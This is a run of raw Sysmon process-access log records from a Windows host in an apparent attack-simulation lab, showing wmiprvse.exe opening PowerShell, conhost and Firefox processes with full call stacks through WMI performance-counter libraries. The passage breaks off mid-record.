21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151061Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151060Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151059Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151058Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151057Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151056Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151055Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151054Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151053Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151052Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151051Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151050Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151049Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151048Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151047Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151046Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla 